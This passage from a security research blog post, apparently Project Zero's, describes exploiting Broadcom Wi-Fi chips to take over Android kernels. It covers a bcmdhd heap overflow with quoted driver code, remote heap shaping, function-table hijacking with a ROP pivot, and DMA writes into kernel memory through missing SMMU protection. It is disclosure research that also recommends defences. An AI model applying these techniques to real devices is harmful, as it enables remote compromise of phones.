However… Since we already have code-execution on the Wi-Fi SoC, we can simply “revert” the patch. All it takes is for us to “patch out” the validation method in the firmware, thereby causing any received frame to once again be forwarded blindly to the host. This, in turn, allows us to inject arbitrary messages into the communication protocol between the host and the Wi-Fi chip. Moreover, since the validation method is stored in RAM, and all of RAM is marked as RWX, this is as simple as writing “MOV R0, #0; BX LR” to the function’s prologue.

The Attack Surface
As we mentioned earlier, the attack surface exposed by the internal communication channel is huge. Tracing the control flow from the entry point for handling event frames (dhd_wl_host_event), we can see that several events receive “special treatment”, and are processed independently (see wl_host_event and wl_show_host_event). Once the initial treatment is done, the frames are inserted into a queue. Events are then dequeued by a kernel thread whose sole purpose is to read events from the queue and dispatch them to their corresponding handler function. This correlation is done by using the event’s internal “event-type” field as an index into an array of handler functions, called evt_handler.

While there are up to 144 different supported event codes, the host driver for Android, bcmdhd, only supports a much smaller subset of these. Nonetheless, about 35 events are supported within the driver, each including their own elaborate handlers.
Now that we’re convinced that the attack surface is large enough, we can start hunting for bugs! Unfortunately, it seems like the Wi-Fi chip is considered as “trusted”; as a result, some of the validations in the host’s driver are insufficient… Indeed, auditing the relevant handler functions and auxiliary protocol handlers outlined above, we find a substantial number of vulnerabilities. The Vulnerability
Taking a closer look at the vulnerabilities we’ve found, we can see that they all differ from one another slightly. Some allow for relatively strong primitives, some weaker. However, most importantly, many of them have various preconditions which must be fulfilled to successfully trigger them; some are limited to certain physical interfaces, while others work only in certain configurations of the driver. Nonetheless, one vulnerability seems to be present in all versions of bcmdhd and in all configurations - if we can successfully exploit it, we should be set.
Let’s take a closer look at the event frame in question. Events of type "WLC_E_PFN_SWC" are used to indicate that a “Significant Wi-Fi Change” (SWC) has occurred within the firmware and must be handled by the host. Instead of directly handling these events, the host’s driver simply gathers all the transferred data from the firmware, and broadcasts a “vendor event” packet via Netlink to the cfg80211 layer.
More concretely, each SWC event frame transmitted by the firmware contains an array of events (of type wl_pfn_significant_net_t), a total count (total_count), and the number of events in the array (pkt_count). Since the total number of events can be quite large, it might not fit in a single frame (i.e., it might be larger than the the maximal MSDU). In this case, multiple SWC event frames can be sent consecutively - their internal data will be accumulated by the driver until the total count is reached, at which point the driver will process the entire list of events.
Reading through the driver’s code, we can see that when this event code is received, an initial handler is triggered in order to deal with the event. The handler then internally calls into the "dhd_handle_swc_evt" function in order to process the event's data. Let’s take a closer look:
1.  void* dhd_handle_swc_evt(dhd_pub_t *dhd,const void *event_data,int *send_evt_bytes)
2.  {
3.   ...
4.   wl_pfn_swc_results_t *results = (wl_pfn_swc_results_t *)event_data;
5.   ...
6.   gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);7.   params = &(gscan_params->param_significant);
8.   ...
9.   if (!params->results_rxed_so_far) {
10.      if (!params->change_array) {
11.          params->change_array = (wl_pfn_significant_net_t *)
12.                                  kmalloc(sizeof(wl_pfn_significant_net_t) *13.                                          results->total_count, GFP_KERNEL);
14.          ...
15.      }
16.  }
17.  ...
18.  change_array = &params->change_array[params->results_rxed_so_far];
19.  memcpy(change_array,20.         results->list,21.         sizeof(wl_pfn_significant_net_t) * results->pkt_count);
22.  params->results_rxed_so_far += results->pkt_count;
23.  ...
24. }
(where "event_data" is the arbitrary data encapsulated in the event passed in from the firmware)
As we can see above, the function first allocates an array to hold the total count of events (if one hasn’t been allocated before) and then proceeds to concatenate the encapsulated data starting from the appropriate index (results_rxed_so_far) in the buffer.
However, the handler fails to verify the relation between the total_count and the pkt_count! It simply “trusts” the assertion that the total_count is sufficiently large to store all the subsequent events passed in. As a result, an attacker with the ability to inject arbitrary event frames can specify a small total_count and a larger pkt_count, thereby triggering a simple kernel heap overflow.Remote Kernel Heap Shaping
This is all well and good, but how can we leverage this primitive from a remote vantage point? As we’re not locally present on the device, we’re unable to gather any data about the current state of the heap, nor do we have address-space related information (unless, of course, we’re able to somehow leak this information). Many classic exploits targeting kernel heap overflows rely on the ability to shape the kernel’s heap, ensuring a certain state prior to triggering an overflow - an ability we also lack at the moment.
What do we know about the allocator itself? There are a few possible underlying implementations for the kmalloc allocator (SLAB, SLUB, SLOB), configurable when building the kernel. However, on the vast majority of devices, kmalloc uses “SLUB” - an unqueued “slab allocator” with per-CPU caches.
Each “slab” is simply a small region from which identically-sized allocations are carved. The first chunk in each slab contains its metadata (such as the slab’s freelist), and subsequent blocks contain the allocations themselves, with no inline metadata. There are a number of predefined slab size-classes which are used by kmalloc, typically spanning from as little as 64 bytes, to around 8KB. Unsurprisingly, the allocator uses the best-fitting slab (smallest slab that is large enough) for each allocation. Lastly, the slabs’ freelists are consumed linearly - consecutive allocations occupy consecutive memory addresses. However, if objects are freed within the slab, it may become fragmented - causing subsequent allocations to fill-in “holes” within the slab instead of proceeding linearly.With this in mind, let’s take a step back and analyse the primitives at hand. First, since we are able to arbitrarily specify any value in total_count, we can choose the overflown buffer’s size to be any multiple of sizeof(wl_pfn_significant_net). This means we can inhabit any slab cache size of our choosing. As such, there’s no limitation on the size of the objects we can target with the overflow. However, this is not quite enough… For starters, we still don’t know anything about the current state of the slabs themselves, nor can we trigger remote allocations in slabs of our choosing.
It seems that first and foremost, we need to find a way to remotely shape slabs. Recall, however, that there are a few obstacles we need to overcome. As SLUB maintains per-CPU caches, the affinity of the kernel thread in which the allocation is performed must be the same as the one from which the overflown buffer is allocated. Gaining a heap shaping primitive on a different CPU core will cause the allocations to be taken from different slabs. The most straightforward way to tackle this issue is to confine ourselves to heap shaping primitives which can be triggered from the same kernel thread on which the overflow occurs. This is quite a substantial constraint… In essence, it forces us to disregard allocations that occur as a result of processes that are external to the event handling itself.
Regardless, with a concrete goal in mind, we can start looking for heap shaping primitives in the registered handlers for each of the event frames. As luck would have it, after going through every handler, we come across a (single) perfect fit!
Events frames of type “WLC_E_PFN_BSSID_NET_FOUND” are handled by the handler function dhd_handle_hotlist_scan_evt. This function accumulates a linked list of scan results. Every time an event is received, its data is appended to the list. Finally, when an event arrives with a flag indicating it is the last event in the chain, the function passes on the collected list of events to be processed. Let’s take a closer look:
1. void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data,2.                                   int *send_evt_bytes, hotlist_type_t type)3. {4.    struct dhd_pno_gscan_params *gscan_params;5.    wl_pfn_scanresults_t *results = (wl_pfn_scanresults_t *)event_data;6.    gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);7.    ...8.    malloc_size = sizeof(gscan_results_cache_t) +9.                      ((results->count - 1) * sizeof(wifi_gscan_result_t));10.   gscan_hotlist_cache = (gscan_results_cache_t *) kmalloc(malloc_size, GFP_KERNEL);11.   ...12.   gscan_hotlist_cache->next = gscan_params->gscan_hotlist_found;13.   gscan_params->gscan_hotlist_found = gscan_hotlist_cache;14.   ...15.   gscan_hotlist_cache->tot_count = results->count;16.   gscan_hotlist_cache->tot_consumed = 0;17.   plnetinfo = results->netinfo;18.   for (i = 0; i < results->count; i++, plnetinfo++) {19      hotlist_found_array = &gscan_hotlist_cache->results[i];20.     ... //Populate the entry with the sanitised network information21.   }22.  if (results->status == PFN_COMPLETE) {23.    ... //Process the entire chain24.  }25.  ...26.}
Awesome - looking at the function above, it seems that we’re able to repeatedly cause allocations of size { sizeof(gscan_results_cache_t) + (N-1) * sizeof(wifi_gscan_result_t) | N > 0 } (where N denotes results->count). What’s more, these allocations are performed in the same kernel thread, and their lifetime is completely controlled by us! As long as we don’t send an event with the PFN_COMPLETE status, none of the allocations will be freed.
Before we move on, we’ll need to choose a target slab size. Ideally, we’re looking for a slab that’s relatively inactive. If other threads on the same CPU choose to allocate (or free) data from the same slab, this would add uncertainty to the slab’s state and may prevent us from successfully shaping it. After looking at /proc/slabinfo and tracing kmalloc allocations for every slab with the same affinity as our target kernel thread, it seems that the kmalloc-1024 slab is mostly inactive. As such, we’ll choose to target this slab size in our exploit.
By using the heap shaping primitive above we can start filling slabs of any given size with  “gscan” objects. Each “gscan” object has a short header containing some metadata relating to the scan and a pointer to the next element in the linked list. The rest of the object is then populated by an inline array of “scan results”, carrying the actual data for this node.
Going back to the issue at hand - how can we use this primitive to craft a predictable layout?
Well, by combining the heap shaping primitive with the overflow primitive, we should be able to properly shape slabs of any size-class prior to triggering the overflow. Recall the initially any given slab may be fragmented, like so:However, after triggering enough allocations (e.g. (SLAB_TOTAL_SIZE / SLAB_OBJECT_SIZE) - 1) with our heap shaping primitive, all the holes (if present) in the current slab should get populated, causing subsequent allocations of the same size-class to be placed consecutively.
Now, we can send a single crafted SWC event frame, indicating a total_count resulting in an allocation from the same target slab. However, we don’t want to trigger the overflow yet! We still have to shape the current slab before we do so. To prevent the overflow from occurring, we’ll provide a small pkt_count, thereby only partially filling in the buffer.
Finally, using the heap shaping primitive once again, we can fill the rest of the slab with more of our “gscan” objects, bringing us to the following heap state:

Okay… We’re getting there! As we can see above, if we choose to use the overflow primitive at this point, we could overwrite the contents of one of the “gscan” objects with our own arbitrary data. However, we’ve yet to determine exactly what kind of result that would yield…Analysing The Constraints
In order to determine the effect of overwriting a “gscan” object, let’s take a closer look at the flow that processes a chain of “gscan” objects (that is, the operations performed after an event with a “completion” flag is received). This processing is handled by wl_cfgvendor_send_hotlist_event. The function goes over each of the events in the list, packs the event’s data into an SKB, and subsequently broadcasts the SKB over Netlink to any potential listeners.
However, the function does have a certain obstacle it needs to overcome; any given “gscan” node may be larger than the maximal size of an SKB. Therefore, the node would need to be split into several SKBs. To keep track of this information, the “tot_count” and “tot_consumed” fields in the “gscan” structure are utilised. The “tot_count” field indicates the total number of embedded scan result entries in the node’s inline array, and the “tot_consumed” field indicates the number of entries consumed (transmitted) so far.
As a result, the function slightly modifies the contents of the list while processing it. Essentially, it enforces the invariant that each processed node’s “total_consumed” field will be modified to match its “tot_count” field. As for the data being transmitted and how it’s packed, we’ll skip those details for brevity’s sake. However, it’s important to note that other than the aforementioned side effect, the function above appears to be quite harmless (that is, no further primitives can be “mined” from it). Lastly, after all the events are packed into SKBs and transmitted to any listeners, they can finally be reclaimed. This is achieved by simply walking over the list, and calling “kfree” on each entry.
Putting it all together, where does this leave us with regards to exploitation? Assuming we choose to overwrite one of the “gscan” entries using the overflow primitive, we can modify its “next” field (or rather, must, as it is the first field in the structure) and point it at any arbitrary address. This would cause the processing function to use this arbitrary pointer as if it were an element in the list.
Due to the invariant of the processing function - after processing the crafted entry, its 7th byte (“tot_consumed”) will be modified to match its 6th byte (“tot_count”). In addition, the pointer will then be kfree-d after processing the chain. What’s more, recall that the processing function iterates over the entire list of entries. This means that the first four bytes in the crafted entry (its “next” field) must either point to another memory location containing a “valid” list node (which must then satisfy the same constraints), or must otherwise hold the value 0 (NULL), indicating that this is the last element in the list.
This doesn’t look easy… There’s quite a large number of constraints we need to consider. If we willfully choose the ignore the kfree for a moment, we could try and search for memory locations where the first four bytes are zero, and where it would be beneficial to modify the 7th byte to match the 6th. Of course, this is just the tip of the iceberg; we could repeatedly trigger the same primitive in order to repeatedly copy bytes one position to the left. Perhaps, if we were able to locate a memory address where enough zero bytes and enough bytes of our choosing are present, we could craft a target value by consecutively using these two primitives.
In order to gage the feasibility of this approach, I’ve encoded the constraints above in a small SMT instance (using Z3), and supplied the actual heap data from the kernel, along with various target values and their corresponding locations. Additionally, since the kernel’s translation table is stored at a constant address in the kernel’s VAS and even slight modifications to it can result in exploitable conditions, its contents (along with corresponding target values) was added to the SMT instance as well. The instance was constructed to be satisfiable if and only if any of the target values could occupy any of the target locations within no more than ten “steps” (where each step is an invocation of the primitive). Unfortunately, the results were quite grim… It seemed like this approach just wasn’t powerful enough.
Moreover, while this idea might be nice in theory, it doesn’t quite work in practice. You see, calling kfree on an arbitrary address is not without side-effects of its own. For starters, the page containing the memory address must be marked as either a “slab” page, or as “compound”. This only holds true (in general) for pages actually used by the slab allocator. Trying to call kfree on an address in a page that isn’t marked as such, triggers a kernel panic (thereby crashing the device).
Perhaps, instead, we can choose to ignore the other constraints and focus on the kfree? Indeed, if we are able to consistently locate an allocation whose data can be used for the purpose of the exploit, we could attempt to free that memory address, and then “re-capture” it by using our heap shaping primitive. However, this raises several additional questions. First, will we be able to consistently locate a slab-resident address? Second, even if we were to find such an address, surely it will be associated with a per-CPU cache, meaning that freeing it will not necessarily allow us to reclaim it later on. Lastly, whichever allocation we do choose to target, will have to satisfy the constraints above - that is, the first four bytes must be zero, and the 7th byte will be modified to match the 6th.
However, this is where some slight trickery comes in handy! Recall that kmalloc holds a number of fixed-size caches. Yet what should happen when a larger allocation is requested? In turn out that in that case, kmalloc simply returns a number of consecutive free pages (using __get_free_pages) and returns them to the caller. This is done without any per-CPU caching. As such, if we are able to free a large allocation, we should then be able to reclaim it without having to consider which CPU allocated it in the first place.
This may solve the problem of affinity, but it still doesn’t help us locate these allocations. Unfortunately, the slab caches are allocated quite late in the kernel’s boot process, and their contents are very “noisy”. This means that even guessing a single address within a slab is quite difficult, even more so for remote attackers. However, early allocations which use the large allocation flow (that is, which are created using __get_free_pages) do consistently inhabit the same memory addresses! This is as long as they occur early enough during the kernel’s initialisation so that no non-deterministic events happen concurrently.
Combining these two facts, we can search for a large early allocation. After tracing the large allocation path and rebooting the kernel, it seems that there are indeed quite a few such allocations. To help navigate this large trace, we can also compile the Linux kernel with a special GCC plugin that outputs the size of each structure used in the kernel. Using these two traces, we can quickly navigate the early large allocations, and try and search for a potential match.
After going over the list, we come across one seemingly interesting entry:

Putting It All Together
During the bcmdhd driver’s initialisation, it calls the wiphy_new function in order to allocate an instance of wl_priv. This instance is used to hold much of the metadata related to the driver’s operation. But there’s one more sneaky little piece of data hiding within this structure - the event handler function pointer array used to handle incoming event frames! Indeed, the very same table we were discussing earlier on (evt_handler), is stored within this object. This leads us to a direct path for exploitation - simply kfree this object, then send an SWC event frame to reclaim it, and fill it with our own arbitrary data.
Before we can do so, however, we’ll need to make sure that the object satisfies the constraints mandated by the processing function. Namely, the first four bytes must be zero, and we must be able to modify the 7th byte to match the value of the 6th byte. While the second constraint poses no issue at all, the first constraint turns out to be quite problematic! As it happens, the first four bytes are not zero, but in fact point to a block of function pointers related to the driver. Does this mean we can’t use this object after all?
No - as luck would have it, we can still use one more trick! It turns out that when kfree-ing a large allocation, the code path for kfree doesn’t require the passed in pointer to point to the beginning of the allocation. Instead, it simply fetches the pages corresponding to the allocation, and frees them instead. This means that by specifying an address located within the structure that does match the constraints, we’ll be able to both satisfy the requirements imposed by the processing function and free the underlying object. Great.
Putting this all together, we can now simply send along a SWC event frame in order to reclaim the evt_handler function pointer array, and populate it with our own contents. As there is no KASLR, we can search for a stack pivot gadget in the kernel image that will allow us to gain code execution. For the purpose of the exploit, I’ve chosen to replace the event handler for WLC_E_SET_SSID with a stack pivot into the event frame itself (which is stored in R2 when the event handler is executed). Lastly, by placing a ROP stack in a crafted event frame of type WLC_E_SET_SSID, we can now gain control over the kernel thread’s execution, thus completing our exploit.

You can find a sample exploit for this vulnerability here. It includes a short ROP chain that simply calls printk. The exploit was built against a Nexus 5 with a custom kernel version. In order to modify it to work against different kernel versions, you’ll need to fill in the appropriate symbols (under Moreover, while the primitives are still present in 64-bit devices, there might be additional work required in order to adjust the exploit for those platforms.
With that, let’s move on to the second part of the blog post!Part 2 - The “Easy” WayHow Low Can You Go?
Although we’ve seen that the high-level communication protocols between the Wi-Fi firmware and the host may be compromised, we’ve also seen how tedious it might be to write a fully-functional exploit. Indeed, the exploit detailed above required sufficient information about the device being targeted (such as symbols). Furthermore, any mistake during the exploitation might cause the kernel to crash; thereby rebooting the device and requiring us to start all over again. This fact, coupled with our transient control over the Wi-Fi SoC, makes these types of exploit chains harder to exploit reliably.
That said, up until now we’ve only considered the high-level attack surface exposed to the firmware. In effect, we were thinking of the Wi-Fi SoC and the application processor as two distinct entities which are completely isolated from one another. In reality, we know that nothing can be further from the truth. Not only are the Wi-Fi SoC and the host physically proximate to one another, they also share a physical communication interface.
As we’ve seen before, Broadcom manufactures SoCs that support various interfaces, including SDIO, USB and even PCIe. While the SDIO interface used to be quite popular, in recent years it has fallen out of favour in mobile devices. The main reason for the “disappearance” of SDIO is due to its limited transfer speeds. As an example, Broadcom’s BCM4339 SoC supports SDIO 3.0, a fairly advanced version of SDIO. Nonetheless, it is still limited to a theoretical maximal bus speed of 104 MB/s. On the other hand, 802.11ac has a theoretical maximal speed of 166 MB/s - much more than SDIO can cope with.                                                 BCM4339 Block Diagram
The increased transfer rates caused PCIe to become the most prevalent interface used to connect Wi-Fi SoCs in modern mobile devices. PCIe, unlike PCI, is based on a point-to-point topology. Every device has it’s own serial link connecting it to the host. Due to this design, PCIe enjoys much higher transfer rates per lane than the equivalent rates on PCI (since bus access doesn’t need to be arbitrated); PCIe 1.0 has a throughput of 250 MB/s on a single lane (scaling linearly with the number of lanes).
More concretely, let’s take a look at the adoption rate of PCIe in modern mobile devices. Taking Nexus phones as a case study, it seems that since the Nexus 6, all devices use a PCIe interface instead of SDIO. Much in the same way, all iPhones since the iPhone 6 use PCIe (whereas old iPhones used USB to connect to the Wi-Fi SoC). Lastly, all Samsung flagships since the Galaxy S6 use PCIe.Interface Isolation
So why is this information relevant to our pursuits? Well, PCIe is significantly different to SDIO and USB in terms of isolation. Without going into the internals of each of the interfaces, SDIO simply allows the serial transfer of small command “packets” (on the CMD pin), potentially accompanied by data (on the DATA pins). The SDIO controller then decodes the command and responds appropriately. While SDIO may support DMA (for example, the host can set up a DMA engine to continually read data from the SD bus and transfer it to memory), this feature is not used on mobile devices, and is not an inherent part of SDIO. Furthermore, the low-level SDIO communication on the BCM SoC is handled by the “SDIOD” core. In order to craft special SDIO commands, we would most likely need to gain access to this controller first.
Likewise, USB (up to version 3.1) does not include support for DMA. The USB protocol is handled by the host’s USB controller, which performs the necessary memory access required. Of course, it might be possible to compromise the USB controller itself, and use its interface to the memory system in order to gain memory access. For example, on the Intel Hub Architecture, the USB controller connects to the PCH via PCI, which is capable of DMA. But once again, this kind of attack is rather complex, and is limited to specific architectures and USB controllers.
In contrast to these two interfaces, PCIe allows for DMA by design. This allows PCIe to operate at great speeds without incurring a performance hit on the host. Once data is transferred to the host’s memory, an interrupt is fired to indicate that work needs to be done.
On the transaction layer, PCIe operates by sending small bundles of data, appropriately named “Transaction Layer Packets” (TLPs). Each TLP may be routed by a network of switches, until it reaches the destined peripheral. There, the peripheral decodes the packet and performs the requested memory operation. The TLP’s header encodes whether this is a requested read or write operation, and its body contains any accompanying data related to the request.
                       Structure of a Transaction Layer Packet (TLP)IOU an MMU
While PCIe enables DMA by design, that still doesn’t imply that any PCIe connected peripheral should be able to freely access any memory address on the host. Indeed, modern architectures defend themselves against DMA-capable peripherals by including additional memory mapping units (IOMMUs) on the IO buses connecting the peripherals to main memory.
ARM specifies its own version of an IOMMU, called the “System Memory Mapping Unit” (SMMU). Among other roles, the SMMU is used in order to manage the memory view exposed to different SoC components. In short, each stream of memory transactions is associated with a “Stream ID”. The SMMU then performs a step called “context determination” in order to translate the Stream ID to the corresponding memory context.
Using the memory context, the SMMU is then able to associate the memory operations with the the translation table containing the mappings for the requesting device. Much like a regular ARM MMU, the translation tables are queried in order to translate the input address (either a virtual address or an intermediate physical address) to the corresponding physical address. Of course, along the way the SMMU also ensures that the requested memory operation is, in fact, allowed. If any of these steps fails, a fault is generated.

While this is all well and good in theory, it still doesn’t mean that an SMMU is, in fact, used in practice. Unfortunately, mobile SoCs are proprietary, so it would be hard to determine how and where SMMUs are actually in place. That said, we can still glean some insight from publically available information. For example, by going over the IOMMU bindings in the Linux Kernel, we can see that apparently both Qualcomm and Samsung have their own proprietary implementations of an SMMU (!), with it’s own unique device-tree bindings. However, suspiciously, it seems that the device tree entries for the Broadcom Wi-Fi chip are missing these IOMMU bindings…
Perhaps, instead, Broadcom’s host driver (bcmdhd) manually configures the SMMUs before each peripheral memory access? In order to answer this question, we’ll need to take a closer look at the driver’s implementation of the communication protocol used over PCIe. Broadcom implements their own proprietary protocol called “MSGBUF” in order to communicate with the Wi-Fi chip over PCIe. The host’s implementation of the protocol and the code for handling PCIe can be found under dhd_msgbuf.c and dhd_pcie.c, respectively.
After going through the code, we gain a few key insights into the communication protocol’s inner workings. First, as expected, the driver scans the PCIe interface, accesses the PCI configuration space, and maps all the shared resources into the host’s memory. Next, the host allocates a set of “rings”. Each ring is backed by a DMA-coherent memory region. The MSGBUF protocol uses four rings for data flow, and one ring for control. Each data path (either RX or TX), has two corresponding rings - one to signal the submission of a request, and another to indicate its completion. Yet, there still doesn’t seem to be any reference to an SMMU in the driver so far. Perhaps we have to dig deeper...
So how does the Wi-Fi chip learn about the location of these rings? After all, so far they’re just a bunch of physically contiguous buffers allocated in the driver. Going over the driver’s code, it appears that the host and the chip hold a shared structure, pciedev_shared_t, containing all the PCIe-related metadata, including the location of each of the ring buffers. The host holds its own copy of this structure, but where does the Wi-Fi SoC keep its copy? According to the dhdpcie_readshared function, it appears that the Wi-Fi chip stores a pointer to this structure in the last four bytes of its RAM.

Let’s go ahead and take a look at the structure’s contents. To make this process slightly easier, I’ve written a small script that takes a firmware RAM snapshot (produced using dhdutil), reads the pointer to the PCIe shared structure from the end of RAM, and dumps out the relevant information:

Following the rings_info_ptr field, we can also dump the information about each of the rings - including their size, current index, and physical memory address:

For starters, we can see that the memory addresses specified in these buffers seem to be, in fact, physical memory addresses from the host’s memory. This is slightly suspicious… In the presence of an SMMU, the chip could have used an entirely different address range (which would have then been translated by the SMMU into a physical addresses). However, merely being suspicious is not enough... To check whether or not the an SMMU is present (or active), we’ll need to set up a small experiment!
Recall that the MSGBUF protocol uses the aforementioned ring buffers to indicate submission and completion of events, for both the RX and the TX paths. In essence, during transmission of a frame, the host writes to the TX submission ring. Once the chip transmits the frame, it writes to the TX completion ring to indicate as such. Similarly, when a frame is received, the firmware writes to the RX submission ring, and the host subsequently writes to the RX completion ring upon reception of the frame.
If so, what if we were to modify the ring address corresponding to TX completion ring in the firmware’s PCIe metadata structure, and point it at an arbitrary memory address? If an SMMU is in place and the chosen memory address is not mapped-in for the Wi-Fi chip, the SMMU will generate a fault and no modification will take place. However, if there is no SMMU in place, we should be able to observe this modification by simple dumping the corresponding physical memory range from the host (for example, by using /dev/mem). This small experiment also allows us to avoid reverse-engineering the Wi-Fi firmware’s implementation of the MSGBUF protocol for the time being, which would no doubt be quite tedious.
To make things more interesting, let’s modify the TX completion ring’s address to point at the beginning of the Linux Kernel’s code segment (0x80000 on the Nexus 6P : see /proc/iomem). After generating some Wi-Fi traffic and inspecting the contents of physical memory, we are presented with the following result:

Aha! The Wi-Fi chip managed to DMA into the physical address range containing the host’s kernel, without any interference! This finally confirms our suspicion; either there is no SMMU present, or it isn’t configured to prevent the chip from accessing the host’s RAM.
Not only does this kind of access not require a single vulnerability, but it is also much more reliable to exploit. There’s no need for the exact kernel symbols, or any other preliminary information. The Wi-Fi SoC can simply use its DMA access to scan the physical address ranges in order to locate the kernel. Then, it can identify the kernel’s symbol table in RAM, analyse it to locate the any kernel function it wishes, and proceed to hijack the function by overwriting its code (one such example can be seen in this similar DMA-like attack). All in all, this style of attack is completely portable and 100% reliable -- a significant step-up from the previous exploit we saw.
Although we could stop here, let’s make one additional small effort in order to get slightly better control over this primitive. While we are able to DMA into the host’s memory, we are doing so rather “blindly” at this point. We do not control the data being written, but instead rely on the Wi-Fi firmware’s implementation of the MSGBUF protocol to corrupt the host’s memory. By delving slightly further, we should be able to figure out how the DMA engine on the Wi-Fi chip works, and manually utilise it to access the host’s memory (instead of relying on side-effects, as shown above).
So where do we start? Searching for the “MSGBUF” string, we can see some initialisation routines related to the protocol, which are part of the special “reclaim” region (and are therefore only used during the chip’s initialisation). Nevertheless, reverse-engineering these functions reveals that they reference a set of functions in the Wi-Fi chip’s RAM. Luckily, some of these functions’ names are present in the ROM! Their names seem quite relevant: “dma64_txfast”, “dma64_txreset” - it seems like we’re on the right track.
Once again, we are spared some reverse-engineering effort. Broadcom’s SoftMAC driver, brcmsmac, contains the implementation for these exact functions. Although we can expect some differences, the general idea should remain the same.
Combing through the code, it appears that for every DMA-capable source or sink, there exists a corresponding DMA metadata structure, called “dma_info”. This structure contains pointers to the DMA RX and TX registers, as well as the DMA descriptor rings into which the DMA source or destination addresses are inserted. Additionally, each structure is assigned an 8-byte name which can be used to identify it. What’s more, every dma_info structure begins with a pointer to the RAM function block containing the DMA functions - the same block we identified earlier. Therefore, we can locate all instances of these DMA metadata structures by simply searching for this pointer in the Wi-Fi SoC’s RAM.
Now that we know the format of these metadata structures and have a means to locate them, we can try and search for the instance corresponding to the DMA TX path from the Wi-Fi chip to the host.
Unfortunately, this is easier said than done. After all, we can expect to find multiple instances of these structures, as the Wi-Fi chip performs DMA to and from many sources and sinks. For example, the firmware likely uses SoC-internal DMA engines to perform access the internal RX and TX FIFOs. So how can we identify the correct DMA descriptor?
Recall that each descriptor has an associated “name” field. Let’s search for all the DMA descriptors in RAM (by searching for the DMA function block pointer), and output the corresponding name for each instance:
Found dma_info - Address: 0x00220288, Name: "wl0"Found dma_info - Address: 0x00220478, Name: "wl0"Found dma_info - Address: 0x00220A78, Name: "wl0"Found dma_info - Address: 0x00221078, Name: "wl0"Found dma_info - Address: 0x00221BF8, Name: "wl0"Found dma_info - Address: 0x0022360C, Name: "wl0"Found dma_info - Address: 0x00236268, Name: "D2H"Found dma_info - Address: 0x00238B7C, Name: "H2D"
Great! While there are a few nondescript dma_info instances which are probably used internally (as suspected), there are also two instances which seem to correspond to host-to-device (H2D) and device-to-host (D2H) DMA accesses. Since we’re interested in DMA-ing into the host’s memory, let’s take a closer look at the D2H structure:

Note that the RX and TX registers point to an area outside the Wi-Fi firmware’s ROM and RAM. In fact, they point to backplane addresses corresponding to the DMA engine’s registers. In contrast, the RX and TX descriptor ring pointers do, indeed, point to memory locations within the SoC’s RAM.
By going over the DMA code in brcmsmac and the MSGBUF protocol implementation in the host’s driver, we are able to finally piece together the details. First, the host posts physical addresses (corresponding to SKBs) to the chip, using the MSGBUF protocol. These addresses are then inserted into the DMA descriptor rings by the firmware’s MSGBUF implementation. Once the rings are populated, the Wi-Fi chip simply writes to the backplane registers in order to “kick off” the DMA engine. The DMA engine will then go over the descriptor list, and consume the descriptor at the current ring index for the DMA access. Once a DMA descriptor is consumed, its value is set to a special “magic” value (0xDEADBEEF).
Therefore, all we need to do in order to manipulate the DMA engine into writing into our own arbitrary physical address is to modify the DMA descriptor ring. Since the MSGBUF protocol is constantly operating as frames are being sent back and forth, the descriptor rings change rapidly. It would be useful if we could “hook” one of the functions called during the DMA TX flow, allowing us to quickly replace the current descriptors with our own crafted values.
As luck would have it, while the dmx64_txfast function is located in ROM, its prologue starts with a branch into RAM. This allows us to use our patcher from the previous blog post in order to hook the function, and execute our own shellcode stub. Let’s write a small stub that simply goes over the D2H DMA descriptors, and changes every non-consumed descriptor to our own pointer. By doing so, subsequent calls to the DMA engine should write the received frame’s contents into the aforementioned address. After applying the patch and generating Wi-Fi traffic, we are greeted with the following result:

Ah-ha! We managed to DMA arbitrary data into an address of our choosing. Using this primitive, we can finally hijack any kernel function with our own crafted data.
Lastly - the experiment described above was performed on a Nexus 6P, which is based on Qualcomm’s Snapdragon 810 SoC. This raises the question: perhaps different SoCs exhibit different behaviour? To test out this theory, let’s repeat the same experiment on a Galaxy S7 Edge, which is based on Samsung’s Exynos 8890 SoC.
Using a previously disclosed privilege escalation to inject code into system_server, we can directly issue the ioctls required to interact with the bcmdhd driver, thus replacing the chip memory access capabilities provided by dhdutil in the above experiment. Similarly, using a previously disclosed kernel exploit, we are able to execute code within the kernel, allowing us to observe changes to the kernel’s code segments.
Putting this together, we can extract the Wi-Fi chip’s (BCM43596) ROM, inspect it, and locate the DMA function as described above. Then, we can insert the same hook; pointing any non-consumed DMA RX descriptors at the kernel code’s physical address. After installing the hook and generating some Wi-Fi traffic, we observe the following result:

Once again we are able to DMA freely into the kernel (bypassing RKP’s protection along the way)! It seems that both Samsung’s Exynos 8890 SoC and Qualcomm’s Snapdragon 810 either lack SMMUs or fail to utilise them.Afterword
In conclusion, we’ve seen that the the isolation between the host and the Wi-Fi SoC can, and should, be improved. While flaws exist in the communication protocols between the host and the chip, these can eventually be solved over time. However, the current lack of protection against a rogue Wi-Fi chip leaves much to be desired.
Since mobile SoCs are proprietary, it remains unknown whether current-gen SoCs are capable of facilitating such isolation. We hope that SoCs that do, indeed, have the capability to enable memory protection (for example, by means of an SMMU), choose to do so soon. For the SoCs that are incapable of doing so, perhaps this research will serve as a motivator when designing next-gen hardware.
The current lack of isolation can also have some surprising side effects. For example, Android contexts which are able to interact with the Wi-Fi firmware, can leverage the Wi-Fi SoC’s DMA capability in order to directly hijack the kernel. Therefore, these contexts should be thought of being “as privileged as the kernel”, an assumption which I believe is not currently made by Android’s security architecture.  
The combination of an increasingly complex firmware and Wi-Fi’s incessant onwards march, hint that firmware bugs will probably be around for quite some time. This hypothesis is supported by the fact that even a relatively shallow inspection of the firmware revealed a number of bugs, all of which were exploitable by remote attackers.
While memory isolation on its own will help defend against a rogue Wi-Fi SoC, the firmware’s defenses can also be bolstered against attacks. Currently, the firmware lacks exploit mitigations (such as stack cookies), and doesn’t make full use of the existing security mechanisms (such as the MPU). Hopefully, future versions are able to better defend against such attacks by implementing modern exploit mitigations and utilising SoC security mechanisms.
Categories: Security

Notes on Windows Uniscribe Fuzzing

Google Project Zero - Mon, 04/10/2017 - 10:25
Posted by Mateusz Jurczyk of Google Project Zero
